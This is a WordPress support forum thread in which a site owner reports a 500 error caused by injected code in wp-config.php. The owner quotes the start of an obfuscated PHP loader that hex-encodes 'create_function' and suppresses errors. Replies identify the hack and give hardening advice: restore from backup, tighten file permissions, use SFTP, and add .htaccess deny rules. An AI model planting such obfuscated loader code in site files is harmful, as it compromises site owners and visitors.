500 server error

  • SickSquirrel

    (@sicksquirrel)


    12 years, 7 months ago

    Checking script in one site said it was a 500 error. Tried to get to it, the admin, page is blank on iPad. Site is 500.

    I went in via FTP and see wp-config.php changed today. I remember logging in earlier and a script said to fix that file, so I said yes. Due to memory issues, I can’t remember which script. I can’t get in to see if it was a plugin or not. WAIT I do remember looking at WP All In One Security but don’t remember which asked for change. I know I went to Filesystem Security if that helps. One of the tabs said to upgrade/ WAIT I remember. Chmod was 0666 and it said it needed 0644 or vice versa.

    Anyway, the config file begins with the following, then about 200 lines of letters/numbers, at least that way in iPad. I can’t check my Windows laptop

    <?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("",

    Don’t know if that code was added today but chmod changed.

Viewing 14 replies - 1 through 14 (of 14 total)
  • Moderator t-p

    (@t-p)

    12 years, 7 months ago

    Error 500 ISE is very generic and can be caused by numerous underlying issues. Here are some thing you can try to solve it:
    – Your first step should be checking your site’s error logs for a more specific error message. If you need help locating them, ask your hosting provider to help you with that.
    – check with your host if the domain name is configured properly to point to public_html folder
    – It may indicate .htaccess issue. Regenerate .htaccess, and be sure the encoding in your text editor is Unicode No BOM
    – It may also indicate a problem with the configuration on the server. Usually your hosting company tech support can help.
    – it could be problem with the plugins, try resetting the plugins folder by FTP or phpMyAdmin.
    – it could be a problem with the theme. Momentarily, try switching to the default WordPress theme via FTP or whatever file management application your host provides by renaming your current theme to rule out any theme specific issue.
    – If the above troubleshooting steps fail to resolve the issue, try manually re-uploading all files and folders EXCEPT the wp-config.php file and the /wp-content/ directory from a fresh download of WordPress. Make sure that you delete the old copies of files & folder before uploading the new ones. Read the Manual Update directions first!

    Thread Starter SickSquirrel

    (@sicksquirrel)

    12 years, 7 months ago

    But the only file changed was config. The paste showed something was wrong. Plus

    14:19:15 2013] [error] [client *******] PHP Parse error: syntax error, unexpected ‘<‘ in /………………………./user_dir/site/wp-config.php on line 1

    Scriptrunner (Doug Sparling)

    (@scriptrunner)

    12 years, 7 months ago

    That’s an exploit/hack on WordPress and has effected your site. You’re going to need to do a restore from a backup.

    See Codex: FAQ My site was hacked

    Fix for $zend_framework WordPress Hack

    $zend_framework WordPress Hacks

    Or just Google “wordpress zend framework hack”

    Thread Starter SickSquirrel

    (@sicksquirrel)

    12 years, 7 months ago

    Thanks. How did they get to it to exploit? What is the exploit? Any other files they old have changed? I have security precautions in place …

    leejosepho

    (@leejosepho)

    12 years, 7 months ago

    How did they get to it to exploit?

    As suggested by Bulletproof Security, permissions for wp-config.php should be 0400 and left there until *you* might make a change.

    htaccess 0404
wp-config.php 0400
index.php 0400
wp-blog-header.php 0400
root folder 0705
wp-admin/ 0705
wp-includes/ 0705
wp-content/ 0705
    Thread Starter SickSquirrel

    (@sicksquirrel)

    12 years, 7 months ago

    Thanks. Will change all once I’m restored. Will do it on all other sites, too

    Thread Starter SickSquirrel

    (@sicksquirrel)

    12 years, 7 months ago

    My FTP program (FTP Pro To Go as I’m on iPad right now; tomorrow Windows) allows 3 numbers. Cn you give it as Owner Group World?

    leejosepho

    (@leejosepho)

    12 years, 7 months ago

    My FileZilla is the same, so just drop the preceding zero.

    Thread Starter SickSquirrel

    (@sicksquirrel)

    12 years, 7 months ago

    Ah, thank you. Will try it later as FTP is busy downloading site.

    leejosepho

    (@leejosepho)

    12 years, 7 months ago

    Ask your host about switching to SFTP since FTP sends your credentials and whatever else out in plain text.

    Thread Starter SickSquirrel

    (@sicksquirrel)

    12 years, 7 months ago

    Host says no. “Pam, unfortunately SFTP isn’t supported at this time as it requires a shell/ssh connection to tunnel through and we do not allow SSH due to security reasons.”

    I used to use SSH to reach my own server years ago but I had full control and a server admin who was a security whiz. Now I have to bend to their rules.

    I did set chmod as you directed on all sites. My only concern is your statement abut changing it back. What needs to be changed and to what do I change it to?

    leejosepho

    (@leejosepho)

    12 years, 7 months ago

    If you are asking about “permissions for wp-config.php should be 0400 and left there until *you* might make a change”, I am saying to never open those permissions for any script unless it is something like the Sucuri plugin resetting your keys after a hack. Also, in the morning (at my other machine) I will post a few lines of code to add at the top of htaccess to “Deny All” in relation to wp-config.php.

    Thread Starter SickSquirrel

    (@sicksquirrel)

    12 years, 7 months ago

    Thanks. So the config file should never need tweaking so I can leave it set as is. I have two more sites to do, I did notice a couple of sites gave a 550 error when putting .htaccess to 404. One allowed it after but the rest said no. I only did the main file, not each folder.

    550 CHMOD SITE FAILED

    leejosepho

    (@leejosepho)

    12 years, 7 months ago

    I did notice a couple of sites gave a 550 error when putting .htaccess to 404. One allowed it after but the rest said no. I only did the main file, not each folder.

    That kind of thing is beyond my knowledge, but I would be finding out exactly why a higher setting seems to be needed. To the best of my knowledge, that file does not need to be changed during the course of normal operation.

    Here is the piece of code I had mentioned:

    ## add at top of htaccess
## note: also go set wp-config.php permissions to 0400
# deny wp-config.php
<files wp-config.php>
order allow,deny
deny from all
</files>

    Then, this one keeps anyone and everyone from reading .htaccess and any other “dot” file with no name (such as a .pwrd file):

    # deny .htaccess .htpasswd etc.
RedirectMatch 403 /\..*$

Viewing 14 replies - 1 through 14 (of 14 total)

The topic ‘500 server error’ is closed to new replies.